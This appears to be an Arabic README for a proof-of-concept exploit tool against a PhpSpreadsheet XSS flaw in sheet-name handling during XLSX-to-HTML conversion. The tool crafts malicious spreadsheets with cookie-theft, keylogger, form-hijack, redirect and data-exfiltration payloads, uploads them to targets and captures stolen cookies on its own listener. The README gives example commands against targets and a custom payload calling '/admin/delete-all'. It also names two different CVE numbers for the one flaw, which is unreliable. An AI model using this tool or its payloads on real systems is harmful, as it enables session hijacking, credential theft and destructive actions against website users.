
هذا هو PoC/Exploit لثغرة CVE-2024-47875 في PhpSpreadsheet من نوع XSS
هذا هو PoC للثغرة CVE-2025-22131، وهي ثغرة من نوع Cross-Site Scripting (XSS) في إصدارات PhpSpreadsheet السابقة للإصدارات 2.2.2 و2.1.2 و1.29.4. تكمن الثغرة في الدالة generateNavigation()، التي تفشل في تعقيم أسماء الأوراق أثناء التحويل من XLSX إلى HTML، مما يسمح بحقن JavaScript ضار.
معرّف CVE: CVE-2024-47875
نشرة GitHub الأمنية: GHSA-79xx-vf93-p7cx
الإصدارات المتأثرة: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4
المؤلف: Roj
الترخيص: MIT
المستودع: مستودع PoC
📄 يولّد ملفات XLSX خبيثة بحمولات XSS قابلة للتخصيص
🛠️ يدعم أنواعًا متعددة من الحمولات:
cookie_theft: يسرق ملفات تعريف الارتباط الخاصة بالجلسات
redirect: يعيد توجيه المستخدمين إلى موقع يسيطر عليه المهاجم
alert: يعرض تنبيهًا تجريبيًا للـ PoC
keylogger: يلتقط ضغطات المفاتيح
form_hijack: يعترض عمليات إرسال النماذج
data_exfil: يستخرج البيانات من نقطة نهاية محددة
🌐 خادم HTTP مدمج لالتقاط استدعاءات الاستغلال
⬆️ يرفع ملفات XLSX الخبيثة إلى نقطة نهاية مستهدفة
💾 يحفظ البيانات الملتقطة (مثل ملفات تعريف الارتباط) في ملف JSON
🎨 مخرجات طرفية ملوّنة لتحسين قابلية القراءة
🔍 تسجيل مفصّل للتصحيح
python exploit.py -h
🚀 أمثلة على الاستخدام:
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50
# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload
# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack
# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
أتمنى الحصول على ملاحظات، وبالتوفيق لكم جميعًا.